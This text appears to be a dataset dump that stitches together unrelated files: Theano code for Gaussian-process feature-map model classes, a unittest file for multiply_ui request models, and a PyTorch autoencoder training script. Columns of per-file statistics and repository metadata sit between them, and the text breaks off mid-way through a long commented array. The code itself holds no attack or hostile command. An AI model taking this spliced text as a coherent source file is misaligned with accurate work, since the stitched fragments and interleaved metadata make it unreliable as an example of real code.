        Indicator that determines whether to print training messages or not
    '''
    # Class-level defaults; populated per instance by the Model base class.
    setting, compiled_funcs = None, None
    def __init__(self, nfeats, resolution=0.5, penalty=1., transform=True, **args):
        super(GPoTanh, self).__init__(nfeats, resolution, penalty, transform, **args)
    def __str__(self):
        return "GPoTanh (%d, %.2f, %.2f)"%(self.setting['nfeats'], self.setting['resolution'], self.setting['penalty'])
    def randomized_params(self):
        """Draw a random initial parameter list [const, l, f, p(, lm)]."""
        S = self.setting['nfeats']
        const = npr.randn(2)*1e-2   # (a, b): noise/signal variance pre-activations
        l = npr.randn(self.D)       # per-dimension log lengthscales
        f = npr.randn(self.D*S)     # spectral frequencies, flattened (D, S)
        p = 2*np.pi*npr.rand(S)     # phases in [0, 2*pi)
        rand_params = [const, l, f, p]
        if(self.setting['transform']):
            # Extra exponents for the input/output power transforms.
            lm = 2*np.pi*npr.rand(self.D+1)
            rand_params.append(lm)
        return rand_params
    def feature_maps(self, X, params):
        """Build the tanh feature map Phi from the flat params vector."""
        t_ind, S = 0, self.setting['nfeats']
        a = params[0]; t_ind += 1; b = params[1]; t_ind += 1
        sig2_n, sig2_f = 1/(1+TT.exp(a))*self.setting['resolution'], TT.exp(b)
        l = params[t_ind:t_ind+self.D]; t_ind += self.D
        f = params[t_ind:t_ind+self.D*S]; t_ind += self.D*S
        F = TT.reshape(f, (self.D, S))/np.exp(l[:, None])
        p = params[t_ind:t_ind+S]; t_ind += S
        P = TT.reshape(p, (1, S))-TT.mean(F, 0)[None, :]
        FF = TT.dot(X, F)+P
        # Tanh activation, scaled so feature variance matches sig2_f.
        Phi = TT.tanh(FF)*TT.sqrt(sig2_f/FF.shape[1])
        if(type(X) == TT.TensorVariable):
            return sig2_n, sig2_f, FF, Phi
        return Phi
    def transform_inputs(self, params):
        """Symbolic input transform: power transform followed by a Gaussian CDF."""
        if(not self.setting['transform']):
            return super(GPoTanh, self).transform_inputs(params)
        # BUG FIX: the original referenced undefined names `T` and `epsilon`
        # (NameError at run time); use the TT alias and a small local guard.
        epsilon = 1e-6  # numerical guard — TODO confirm intended magnitude
        sign = lambda x: TT.tanh(x*1e3)
        cdf = lambda x: .5*(1+TT.erf(x/TT.sqrt(2+epsilon)+epsilon))
        X = TT.dmatrices('X')
        X_lm = params[-(self.D+1):-1][None, :]
        X = (sign(X)*TT.sqrt(X**2)**X_lm-1)/X_lm
        return cdf(X)
    def transform_outputs(self, params, inverse=None):
        """Symbolic output transform; with `inverse`, map predictions back."""
        if(not self.setting['transform']):
            return super(GPoTanh, self).transform_outputs(params)
        sign = lambda x: TT.tanh(x*1e3)
        y_lm = params[-1]
        if(inverse is not None):
            ty = inverse*y_lm+1
            ty = sign(ty)*TT.sqrt(ty**2)**(1./y_lm)
            return ty
        y = TT.dmatrices('y')
        ty = (sign(y)*TT.sqrt(y**2)**y_lm-1)/y_lm
        # BUG FIX: the original returned the untransformed `y`, silently
        # discarding the computed `ty`.
        return ty
class GPoMax(Model):
    '''
    The :class:`GPoMax` class implements a GPoFM model:
    Gaussian process Optimizing Maxout Feature Maps (GPoMax)

    Parameters
    ----------
    nfeats : an integer
        Number of Neurons
    penalty : a float
        Penalty for prevention of overfitting
    transform : a bool
        Indicator that determines whether to transform the data before training
    X_trans : a string
        Transformation method used for inputs of training data
    y_trans : a string
        Transformation method used for outputs of training data
    verbose : a bool
        Indicator that determines whether to print training messages or not
    '''
    # Class-level defaults; populated per instance by the Model base class.
    setting, compiled_funcs = None, None
    def __init__(self, nfeats, resolution=0.5, penalty=1., transform=True, **args):
        super(GPoMax, self).__init__(nfeats, resolution, penalty, transform, **args)
    def __str__(self):
        return "GPoMax (%d, %.2f, %.2f)"%(self.setting['nfeats'], self.setting['resolution'], self.setting['penalty'])
    def randomized_params(self):
        """Draw a random initial parameter list [const, l, f, p(, lm)]."""
        S = self.setting['nfeats']
        const = npr.randn(2)*1e-2   # (a, b): noise/signal variance pre-activations
        l = npr.randn(self.D)       # per-dimension log lengthscales
        f = npr.randn(self.D*S)     # spectral frequencies, flattened (D, S)
        p = 2*np.pi*npr.rand(S)     # phases in [0, 2*pi)
        rand_params = [const, l, f, p]
        if(self.setting['transform']):
            # Extra exponents for the input/output power transforms.
            lm = 2*np.pi*npr.rand(self.D+1)
            rand_params.append(lm)
        return rand_params
    def feature_maps(self, X, params):
        """Build the maxout feature map Phi from the flat params vector."""
        t_ind, S = 0, self.setting['nfeats']
        a = params[0]; t_ind += 1; b = params[1]; t_ind += 1
        sig2_n, sig2_f = 1/(1+TT.exp(a))*self.setting['resolution'], TT.exp(b)
        l = params[t_ind:t_ind+self.D]; t_ind += self.D
        f = params[t_ind:t_ind+self.D*S]; t_ind += self.D*S
        F = TT.reshape(f, (self.D, S))/np.exp(l[:, None])
        p = params[t_ind:t_ind+S]; t_ind += S
        P = TT.reshape(p, (1, S))-TT.mean(F, 0)[None, :]
        FF = TT.dot(X, F)+P
        # Maxout: each feature column i is the max over the suffix FF[:, i:],
        # built up over the first 80% of the S columns.
        Phi = TT.max(FF, axis=1)[:, None]
        for i in range(1, int(S*0.8)):
            Phi = TT.concatenate((
                TT.max(FF[:, i:], axis=1)[:, None], Phi), axis=1)
        Phi = Phi*TT.sqrt(sig2_f/FF.shape[1])
        if(type(X) == TT.TensorVariable):
            return sig2_n, sig2_f, FF, Phi
        return Phi
    def transform_inputs(self, params):
        """Symbolic input transform: power transform followed by a Gaussian CDF."""
        if(not self.setting['transform']):
            return super(GPoMax, self).transform_inputs(params)
        # BUG FIX: the original referenced undefined names `T` and `epsilon`
        # (NameError at run time); use the TT alias and a small local guard.
        epsilon = 1e-6  # numerical guard — TODO confirm intended magnitude
        sign = lambda x: TT.tanh(x*1e3)
        cdf = lambda x: .5*(1+TT.erf(x/TT.sqrt(2+epsilon)+epsilon))
        X = TT.dmatrices('X')
        X_lm = params[-(self.D+1):-1][None, :]
        X = (sign(X)*TT.sqrt(X**2)**X_lm-1)/X_lm
        return cdf(X)
    def transform_outputs(self, params, inverse=None):
        """Symbolic output transform; with `inverse`, map predictions back."""
        if(not self.setting['transform']):
            return super(GPoMax, self).transform_outputs(params)
        sign = lambda x: TT.tanh(x*1e3)
        y_lm = params[-1]
        if(inverse is not None):
            ty = inverse*y_lm+1
            ty = sign(ty)*TT.sqrt(ty**2)**(1./y_lm)
            return ty
        y = TT.dmatrices('y')
        ty = (sign(y)*TT.sqrt(y**2)**y_lm-1)/y_lm
        # BUG FIX: the original returned the untransformed `y`, silently
        # discarding the computed `ty`.
        return ty
| 36
| 119
| 0.576078
| 1,424
| 9,648
| 3.794944
| 0.103933
| 0.026647
| 0.013323
| 0.019985
| 0.896558
| 0.896558
| 0.896558
| 0.896558
| 0.867691
| 0.867691
| 0
| 0.019501
| 0.277156
| 9,648
| 267
| 120
| 36.134831
| 0.755377
| 0.198072
| 0
| 0.815029
| 0
| 0
| 0.041783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104046
| false
| 0
| 0.028902
| 0.017341
| 0.306358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37aa52347915cb5a71ebd7a12db9e5e6f7fe34e5
| 10,599
|
py
|
Python
|
test/ui/req/test_model.py
|
RaT0M/multiply-ui
|
ad7fffb15cc962604340b31b38d34bc470fa8448
|
[
"MIT"
] | null | null | null |
test/ui/req/test_model.py
|
RaT0M/multiply-ui
|
ad7fffb15cc962604340b31b38d34bc470fa8448
|
[
"MIT"
] | 20
|
2019-05-21T10:33:36.000Z
|
2019-12-11T08:13:29.000Z
|
test/ui/req/test_model.py
|
RaT0M/multiply-ui
|
ad7fffb15cc962604340b31b38d34bc470fa8448
|
[
"MIT"
] | 1
|
2020-10-14T12:32:36.000Z
|
2020-10-14T12:32:36.000Z
|
import unittest
from multiply_ui.ui.req.model import InputRequest, ProcessingRequest, InputIdentifiers
class RequestModelTest(unittest.TestCase):
def test_input_request(self):
input_request = InputRequest(dict(name='bibo',
roi='POLYGON ((7.890891 51.997565, 7.890891 53.066801, '
'9.033867000000001 53.066801, 9.033867000000001 51.997565, '
'7.890891 51.997565))',
timeRange=['2018-07-06', '2018-07-20'],
timeStep=4,
timeStepUnit='days',
spatialResolution=20,
inputTypes=['S2_L1C'],
forwardModels=[
dict(name='s1_sail',
type='kafka',
modelDataType='Sentinel-1',
requiredPriors=['rgwf6', 'fg6'],
outputParameters=['LAI'])],
userPriors=[
dict(name='LAI',
mu=0.2,
unc=0.01),
dict(name='ALA',
mu=1.3),
dict(name='fzxh',
unc=0.01)],
s1TemporalFilter=4,
postProcessors=[
dict(name='APostProcessor',
type=0,
inputTypes=['Sentinel-2'],
indicatorNames=['indicator_0', 'indicator_3'],
variableNames=['variable_1', 'variable_2'])])
)
self.assertEqual('bibo', input_request.name)
self.assertEqual('POLYGON ((7.890891 51.997565, 7.890891 53.066801, 9.033867000000001 53.066801, '
'9.033867000000001 51.997565, 7.890891 51.997565))', input_request.roi)
self.assertEqual(('2018-07-06', '2018-07-20'), input_request.time_range)
self.assertEqual(4, input_request.time_step)
self.assertEqual('days', input_request.time_step_unit)
self.assertEqual(20, input_request.spatialResolution)
self.assertEqual(['S2_L1C'], input_request.input_types)
self.assertEqual('s1_sail', input_request.forward_models[0]['name'])
self.assertEqual('kafka', input_request.forward_models[0]['type'])
self.assertEqual('Sentinel-1', input_request.forward_models[0]['modelDataType'])
self.assertEqual('rgwf6', input_request.forward_models[0]['requiredPriors'][0])
self.assertEqual('fg6', input_request.forward_models[0]['requiredPriors'][1])
self.assertEqual('LAI', input_request.forward_models[0]['outputParameters'][0])
self.assertEqual(3, len(input_request.user_priors))
self.assertEqual('LAI', input_request.user_priors[0]['name'])
self.assertEqual(0.2, input_request.user_priors[0]['mu'])
self.assertEqual(0.01, input_request.user_priors[0]['unc'])
self.assertEqual('ALA', input_request.user_priors[1]['name'])
self.assertEqual(1.3, input_request.user_priors[1]['mu'])
self.assertEqual('fzxh', input_request.user_priors[2]['name'])
self.assertEqual(0.01, input_request.user_priors[2]['unc'])
self.assertEqual(4, input_request.s1_temporal_filter)
self.assertIsNone(input_request.s2_compute_roi)
self.assertIsNotNone(input_request.post_processors)
self.assertEqual(1, len(input_request.post_processors))
self.assertEqual('APostProcessor', input_request.post_processors[0]['name'])
self.assertEqual(0, input_request.post_processors[0]['type'])
self.assertEqual(1, len(input_request.post_processors[0]['inputTypes']))
self.assertEqual('Sentinel-2', input_request.post_processors[0]['inputTypes'][0])
self.assertEqual(2, len(input_request.post_processors[0]['indicatorNames']))
self.assertEqual('indicator_0', input_request.post_processors[0]['indicatorNames'][0])
self.assertEqual('indicator_3', input_request.post_processors[0]['indicatorNames'][1])
self.assertEqual(2, len(input_request.post_processors[0]['variableNames']))
self.assertEqual('variable_1', input_request.post_processors[0]['variableNames'][0])
self.assertEqual('variable_2', input_request.post_processors[0]['variableNames'][1])
self.assertIsNotNone(input_request._repr_html_())
def test_processing_request(self):
input_request = ProcessingRequest(dict(name='bibo',
roi='POLYGON ((7.890891 51.997565, 7.890891 53.066801, '
'9.033867000000001 53.066801, 9.033867000000001 51.997565, '
'7.890891 51.997565))',
timeRange=['2018-07-06', '2018-07-20'],
timeStep=4,
timeStepUnit='days',
spatialResolution=20,
inputTypes=['S2_L1C'],
forwardModels=[dict(
name='s1_sail',
type='kafka',
modelDataType='Sentinel-1',
requiredPriors=['rgwf6', 'fg6'],
outputParameters=['LAI'],
)],
userPriors=[
dict(name='LAI',
mu=0.2,
unc=0.01),
dict(name='ALA',
mu=1.3),
dict(name='fzxh',
unc=0.01)],
s2ComputeRoi=False,
postProcessors=[
dict(name='APostProcessor',
type=0,
inputTypes=['Sentinel-2'],
indicatorNames=['indicator_0', 'indicator_3'],
variableNames=['variable_1', 'variable_2'])],
inputIdentifiers={'S2_L1C': ['IID1', 'IID2', 'IID3']}))
self.assertEqual('bibo', input_request.name)
self.assertEqual('POLYGON ((7.890891 51.997565, 7.890891 53.066801, 9.033867000000001 53.066801, '
'9.033867000000001 51.997565, 7.890891 51.997565))', input_request.roi)
self.assertEqual(('2018-07-06', '2018-07-20'), input_request.time_range)
self.assertEqual(4, input_request.time_step)
self.assertEqual('days', input_request.time_step_unit)
self.assertEqual(20, input_request.spatialResolution)
self.assertEqual(['S2_L1C'], input_request.input_types)
self.assertEqual('s1_sail', input_request.forward_models[0]['name'])
self.assertEqual('kafka', input_request.forward_models[0]['type'])
self.assertEqual('Sentinel-1', input_request.forward_models[0]['modelDataType'])
self.assertEqual('rgwf6', input_request.forward_models[0]['requiredPriors'][0])
self.assertEqual('fg6', input_request.forward_models[0]['requiredPriors'][1])
self.assertEqual('LAI', input_request.forward_models[0]['outputParameters'][0])
self.assertEqual(3, len(input_request.user_priors))
self.assertEqual('LAI', input_request.user_priors[0]['name'])
self.assertEqual(0.2, input_request.user_priors[0]['mu'])
self.assertEqual(0.01, input_request.user_priors[0]['unc'])
self.assertEqual('ALA', input_request.user_priors[1]['name'])
self.assertEqual(1.3, input_request.user_priors[1]['mu'])
self.assertEqual('fzxh', input_request.user_priors[2]['name'])
self.assertEqual(0.01, input_request.user_priors[2]['unc'])
self.assertIsNone(input_request.s1_temporal_filter)
self.assertFalse(input_request.s2_compute_roi)
self.assertIsNotNone(input_request.post_processors)
self.assertEqual(1, len(input_request.post_processors))
self.assertEqual('APostProcessor', input_request.post_processors[0]['name'])
self.assertEqual(0, input_request.post_processors[0]['type'])
self.assertEqual(1, len(input_request.post_processors[0]['inputTypes']))
self.assertEqual('Sentinel-2', input_request.post_processors[0]['inputTypes'][0])
self.assertEqual(2, len(input_request.post_processors[0]['indicatorNames']))
self.assertEqual('indicator_0', input_request.post_processors[0]['indicatorNames'][0])
self.assertEqual('indicator_3', input_request.post_processors[0]['indicatorNames'][1])
self.assertEqual(2, len(input_request.post_processors[0]['variableNames']))
self.assertEqual('variable_1', input_request.post_processors[0]['variableNames'][0])
self.assertEqual('variable_2', input_request.post_processors[0]['variableNames'][1])
self.assertIsInstance(input_request.inputs, InputIdentifiers)
self.assertIsNotNone(input_request._repr_html_())
def test_input_identifiers(self):
    """An InputIdentifiers built from a product/ID mapping renders HTML."""
    identifiers = InputIdentifiers({'S2_L1C': ['IID1', 'IID2', 'IID3']})
    self.assertIsNotNone(identifiers._repr_html_())
| 67.942308
| 111
| 0.512312
| 950
| 10,599
| 5.516842
| 0.108421
| 0.174013
| 0.073268
| 0.119061
| 0.920435
| 0.918145
| 0.905934
| 0.892578
| 0.875787
| 0.875787
| 0
| 0.093938
| 0.371261
| 10,599
| 155
| 112
| 68.380645
| 0.692527
| 0
| 0
| 0.808219
| 0
| 0.013699
| 0.142655
| 0
| 0
| 0
| 0
| 0
| 0.506849
| 1
| 0.020548
| false
| 0
| 0.013699
| 0
| 0.041096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
807511de9e73287f0c7ccbc6617209b84be283ee
| 20,238
|
py
|
Python
|
EasyDeep/net_structures/AutoEncoder.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | 2
|
2020-04-06T09:09:19.000Z
|
2020-07-24T03:59:55.000Z
|
EasyDeep/net_structures/AutoEncoder.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
EasyDeep/net_structures/AutoEncoder.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn
from torch.autograd import Variable
class CNNAutoEncoder(nn.Module):
    """Convolutional autoencoder for single-channel images.

    The encoder compresses the input with strided convolutions and max
    pooling (1 -> 16 -> 8 feature maps); the decoder reconstructs it with
    transposed convolutions, ending in Tanh so outputs lie in [-1, 1].
    """

    def __init__(self):
        super(CNNAutoEncoder, self).__init__()
        # Compression path.
        encoder_layers = [
            nn.Conv2d(1, 16, 3, stride=3, padding=1),
            nn.ReLU(True),
            nn.MaxPool2d(2, stride=2),
            nn.Conv2d(16, 8, 3, stride=2, padding=1),
            nn.ReLU(True),
            nn.MaxPool2d(2, stride=1),
        ]
        # Reconstruction path mirrors the encoder back to one channel.
        decoder_layers = [
            nn.ConvTranspose2d(8, 16, 3, stride=2),
            nn.ReLU(True),
            nn.ConvTranspose2d(16, 8, 5, stride=3, padding=1),
            nn.ReLU(True),
            nn.ConvTranspose2d(8, 1, 2, stride=2, padding=1),
            nn.Tanh(),
        ]
        self.encoder = nn.Sequential(*encoder_layers)
        self.decoder = nn.Sequential(*decoder_layers)

    def forward(self, x):
        """Encode then decode ``x``, returning the reconstruction."""
        return self.decoder(self.encoder(x))
class LinearAutoEncoder(nn.Module):
    """Fully connected autoencoder mapping R^3 -> R^2 -> R^3.

    ``forward`` returns both the reconstruction and the 2-d bottleneck
    code so callers can inspect the learned latent representation.
    """

    def __init__(self):
        super(LinearAutoEncoder, self).__init__()
        self.encoder = nn.Sequential(
            nn.Linear(3, 10),
            nn.Sigmoid(),
            nn.Linear(10, 2),
        )
        self.decoder = nn.Sequential(
            nn.Linear(2, 10),
            nn.Sigmoid(),
            nn.Linear(10, 3),
        )

    def forward(self, x):
        """Return ``(reconstruction, latent_code)`` for input ``x``."""
        code = self.encoder(x)
        return self.decoder(code), code
def train(num_epoch=float("inf"), min_loss=0.00001, max_try_times=None):
    """Train the module-level ``net`` until a stopping criterion fires.

    Stops when the per-epoch loss drops below ``min_loss``, when the
    epoch count exceeds ``num_epoch``, or when the loss has failed to
    improve for ``max_try_times`` consecutive epochs (if given).  The
    trained weights are saved to the module-level ``model_save_path``.

    :param num_epoch: maximum number of epochs; unbounded by default
    :param min_loss: loss threshold that ends training early
    :param max_try_times: patience in epochs without improvement, or
        None to disable stagnation-based early stopping
    """
    last_loss = float("inf")
    try_times = 0
    epoch = 0
    while True:
        train_loss = train_one_epoch(epoch)
        if train_loss > last_loss:
            try_times += 1
        else:
            try_times = 0
            last_loss = train_loss
        # Bug fix: the None-check must be on max_try_times — the original
        # tested ``try_times is not None``, which is always true for an int.
        if max_try_times is not None and try_times == max_try_times:
            print("loss don't decrease in {} epoch".format(max_try_times))
            break
        if train_loss < min_loss:
            break
        if num_epoch < epoch:
            break
        epoch += 1
    # persist the trained weights
    torch.save(net.state_dict(), model_save_path)
def train_one_epoch(epoch):
    """Run one pass over the module-level ``train_data``; return mean loss.

    Uses the module-level ``net``, ``optimizer`` and ``loss_function``.

    :param epoch: epoch index, used only for the progress printout
    :return: average training loss over the dataset (a float)
    """
    train_loss = 0.0
    net.train()
    for sample, label in train_data:
        sample = Variable(torch.from_numpy(sample)).double()
        label = Variable(torch.from_numpy(label)).double()
        optimizer.zero_grad()
        out = net(sample)[0]
        loss = loss_function(out, label)
        loss.backward()
        optimizer.step()
        # .item() detaches the scalar; the original accumulated the
        # deprecated ``loss.data`` and carried an unused ``global data``.
        train_loss += loss.item()
    train_loss = train_loss / len(train_data)
    print("epoch:{} \t train loss \t {}".format(epoch, train_loss))
    return train_loss
def test():
    """Evaluate the saved model and analyse its hidden-layer codes.

    Loads weights from the module-level ``model_save_path``, collects the
    2-d bottleneck code for every training sample, then prints Pearson
    correlations and cross-validated RMSE of a linear regression relating
    the (m, n) angles in ``M_N`` to each latent dimension.
    """
    net.load_state_dict(torch.load(model_save_path))
    net.eval()
    all_loss = 0
    hidden_values = []
    for i, (data, gt) in enumerate(train_data):
        data = Variable(torch.from_numpy(data)).double()
        gt = Variable(torch.from_numpy(gt)).double()
        optimizer.zero_grad()
        out, hidden_out = net(data)
        all_loss += loss_function(out, gt)
        hidden_values.append(hidden_out.data.numpy().tolist())
    print(M_N)
    print(hidden_values)
    from sklearn.linear_model import LinearRegression
    from sklearn.model_selection import cross_val_score
    model = LinearRegression()

    def rmse_cv(model, x, y):
        # cross_val_score returns negated MSE, hence the sign flip.
        return np.sqrt(-cross_val_score(model, x, y, scoring="neg_mean_squared_error", cv=5))

    from scipy.stats import pearsonr
    hidden_output0 = [d[0] for d in hidden_values]
    hidden_output1 = [d[1] for d in hidden_values]
    M = [d[0] for d in M_N]
    N = [d[1] for d in M_N]
    print("pearsonr between M and hidden_output0 is ", pearsonr(M, hidden_output0))
    print("pearsonr between N and hidden_output0 is ", pearsonr(N, hidden_output0))
    print("pearsonr between M and hidden_output1 is ", pearsonr(M, hidden_output1))
    print("pearsonr between N and hidden_output1 is ", pearsonr(N, hidden_output1))
    for latent_dim in (hidden_output0, hidden_output1):
        score = rmse_cv(model, M_N, latent_dim)
        print("{}: {:6f}, {:6f}".format("LR", score.mean(), score.std()))
    # NOTE(review): divides by len(test_data) although the loop above ran
    # over train_data — confirm which dataset this average should use.
    print("train loss \t {}".format(all_loss / len(test_data)))
def set_seed(random_state):
    """Seed every RNG used by the project for reproducible runs.

    Seeds torch (CPU and all GPUs), numpy and the stdlib ``random``
    module, and forces deterministic cuDNN kernels.  Passing ``None``
    leaves all generators untouched.
    """
    import random

    import numpy as np
    import torch

    if random_state is None:
        return
    torch.manual_seed(random_state)            # cpu
    torch.cuda.manual_seed(random_state)       # gpu
    torch.cuda.manual_seed_all(random_state)   # all gpus
    np.random.seed(random_state)               # numpy
    random.seed(random_state)                  # random and transforms
    torch.backends.cudnn.deterministic = True  # cudnn
if __name__ == '__main__':
    import numpy as np
    set_seed(0)
    model_save_path = "AutoEncoder3.pkl"
    # The linear autoencoder is trained in double precision.
    net = LinearAutoEncoder().double()
    loss_function = torch.nn.MSELoss()
    optimizer = torch.optim.SGD(net.parameters(), lr=0.003, weight_decay=0.0001)
    # prepare data: 100 random points on the unit sphere, parameterised by
    # the two angles m in [0, 2*pi) and n in [0, pi/2); the autoencoder
    # target equals its input (self-reconstruction).
    train_data = []
    last_loss = 0
    M_N = []  # the (m, n) angle pairs, kept for the latent-space analysis in test()
    for i in range(100):
        m = np.random.rand() * np.pi * 2
        n = np.random.rand() * np.pi / 2
        M_N.append([m, n])
        # standard spherical-to-Cartesian conversion on the unit sphere
        x = np.cos(m) * np.sin(n)
        y = np.sin(m) * np.sin(n)
        z = np.cos(n)
        train_data.append((np.array([x, y, z], dtype=np.float32), np.array([x, y, z], dtype=np.float32)))
    print("train_data", train_data)
# [(array([-0.13771854, 0.8910034 , 0.43260443], dtype=float32), array([-0.13771854, 0.8910034 , 0.43260443], dtype=float32)), (array([-0.23958386, 0.7161484 , 0.65553874], dtype=float32), array([-0.23958386, 0.7161484 , 0.65553874], dtype=float32)), (array([0.20174214, 0.82494247, 0.52798676], dtype=float32), array([0.20174214, 0.82494247, 0.52798676], dtype=float32)), (array([0.19201311, 0.96669924, 0.16918488], dtype=float32), array([0.19201311, 0.96669924, 0.16918488], dtype=float32)), (array([-0.56285876, 0.06453473, 0.8240299 ], dtype=float32), array([-0.56285876, 0.06453473, 0.8240299 ], dtype=float32)), (array([-0.5859435 , 0.4494396 , 0.67429537], dtype=float32), array([-0.5859435 , 0.4494396 , 0.67429537], dtype=float32)), (array([-0.21069671, 0.9705719 , 0.11660665], dtype=float32), array([-0.21069671, 0.9705719 , 0.11660665], dtype=float32)), (array([0.13305213, 0.03019571, 0.9906489 ], dtype=float32), array([0.13305213, 0.03019571, 0.9906489 ], dtype=float32)), (array([0.96368784, 0.06129395, 0.25990143], dtype=float32), array([0.96368784, 0.06129395, 0.25990143], dtype=float32)), (array([-0.75088 , 0.62854123, 0.20276861], dtype=float32), array([-0.75088 , 0.62854123, 0.20276861], dtype=float32)), (array([-0.9485033 , 0.06380931, 0.31027377], dtype=float32), array([-0.9485033 , 0.06380931, 0.31027377], dtype=float32)), (array([0.11361801, 0.9342788 , 0.3379557 ], dtype=float32), array([0.11361801, 0.9342788 , 0.3379557 ], dtype=float32)), (array([0.78664774, 0.30653343, 0.5359315 ], dtype=float32), array([0.78664774, 0.30653343, 0.5359315 ], dtype=float32)), (array([0.8968932 , 0.43364447, 0.08680448], dtype=float32), array([0.8968932 , 0.43364447, 0.08680448], dtype=float32)), (array([-0.04158014, 0.6048326 , 0.7952664 ], dtype=float32), array([-0.04158014, 0.6048326 , 0.7952664 ], dtype=float32)), (array([0.63210136, 0.69272506, 0.3472461 ], dtype=float32), array([0.63210136, 0.69272506, 0.3472461 ], dtype=float32)), (array([0.10695912, 0.7715111 , 
0.6271606 ], dtype=float32), array([0.10695912, 0.7715111 , 0.6271606 ], dtype=float32)), (array([0.8235503 , 0.04867063, 0.5651514 ], dtype=float32), array([0.8235503 , 0.04867063, 0.5651514 ], dtype=float32)), (array([-0.2843439, 0.7737729, 0.5660601], dtype=float32), array([-0.2843439, 0.7737729, 0.5660601], dtype=float32)), (array([-0.86401117, 0.1542982 , 0.47924608], dtype=float32), array([-0.86401117, 0.1542982 , 0.47924608], dtype=float32)), (array([0.27075577, 0.57308394, 0.77347666], dtype=float32), array([0.27075577, 0.57308394, 0.77347666], dtype=float32)), (array([-0.05495249, 0.07683155, 0.9955286 ], dtype=float32), array([-0.05495249, 0.07683155, 0.9955286 ], dtype=float32)), (array([-0.43480033, 0.7525499 , 0.49458808], dtype=float32), array([-0.43480033, 0.7525499 , 0.49458808], dtype=float32)), (array([0.15877993, 0.12346827, 0.9795634 ], dtype=float32), array([0.15877993, 0.12346827, 0.9795634 ], dtype=float32)), (array([0.29626966, 0.45235285, 0.84119034], dtype=float32), array([0.29626966, 0.45235285, 0.84119034], dtype=float32)), (array([-0.13906367, 0.62033355, 0.7719116 ], dtype=float32), array([-0.13906367, 0.62033355, 0.7719116 ], dtype=float32)), (array([-0.15949965, 0.00582826, 0.98718077], dtype=float32), array([-0.15949965, 0.00582826, 0.98718077], dtype=float32)), (array([0.19861837, 0.15294467, 0.96806955], dtype=float32), array([0.19861837, 0.15294467, 0.96806955], dtype=float32)), (array([-0.17926368, 0.34349096, 0.92188853], dtype=float32), array([-0.17926368, 0.34349096, 0.92188853], dtype=float32)), (array([0.03957067, 0.37248313, 0.92719495], dtype=float32), array([0.03957067, 0.37248313, 0.92719495], dtype=float32)), (array([0.15143952, 0.08261732, 0.9850078 ], dtype=float32), array([0.15143952, 0.08261732, 0.9850078 ], dtype=float32)), (array([-0.10156602, 0.18990242, 0.97653544], dtype=float32), array([-0.10156602, 0.18990242, 0.97653544], dtype=float32)), (array([0.44624254, 0.31695023, 0.8369051 ], dtype=float32), 
array([0.44624254, 0.31695023, 0.8369051 ], dtype=float32)), (array([-0.12853688, 0.08101049, 0.9883904 ], dtype=float32), array([-0.12853688, 0.08101049, 0.9883904 ], dtype=float32)), (array([-0.13130714, 0.07329462, 0.9886285 ], dtype=float32), array([-0.13130714, 0.07329462, 0.9886285 ], dtype=float32)), (array([-0.66960865, 0.04961123, 0.7410553 ], dtype=float32), array([-0.66960865, 0.04961123, 0.7410553 ], dtype=float32)), (array([-0.8113004 , 0.05933623, 0.5816106 ], dtype=float32), array([-0.8113004 , 0.05933623, 0.5816106 ], dtype=float32)), (array([-0.04200754, 0.0449414 , 0.998106 ], dtype=float32), array([-0.04200754, 0.0449414 , 0.998106 ], dtype=float32)), (array([0.11835478, 0.14566281, 0.98222935], dtype=float32), array([0.11835478, 0.14566281, 0.98222935], dtype=float32)), (array([0.11079678, 0.14867364, 0.98265976], dtype=float32), array([0.11079678, 0.14867364, 0.98265976], dtype=float32)), (array([0.3278174 , 0.50939465, 0.7956462 ], dtype=float32), array([0.3278174 , 0.50939465, 0.7956462 ], dtype=float32)), (array([0.8676541 , 0.17726044, 0.46449447], dtype=float32), array([0.8676541 , 0.17726044, 0.46449447], dtype=float32)), (array([-0.08410294, 0.3960722 , 0.9143596 ], dtype=float32), array([-0.08410294, 0.3960722 , 0.9143596 ], dtype=float32)), (array([-0.01072867, 0.14663452, 0.9891326 ], dtype=float32), array([-0.01072867, 0.14663452, 0.9891326 ], dtype=float32)), (array([-0.23487961, 0.965685 , 0.1108331 ], dtype=float32), array([-0.23487961, 0.965685 , 0.1108331 ], dtype=float32)), (array([0.46763715, 0.7296071 , 0.49898794], dtype=float32), array([0.46763715, 0.7296071 , 0.49898794], dtype=float32)), (array([0.8261037 , 0.36304036, 0.4309923 ], dtype=float32), array([0.8261037 , 0.36304036, 0.4309923 ], dtype=float32)), (array([0.17436205, 0.22392225, 0.95888305], dtype=float32), array([0.17436205, 0.22392225, 0.95888305], dtype=float32)), (array([-0.00847769, 0.03042039, 0.9995012 ], dtype=float32), array([-0.00847769, 0.03042039, 
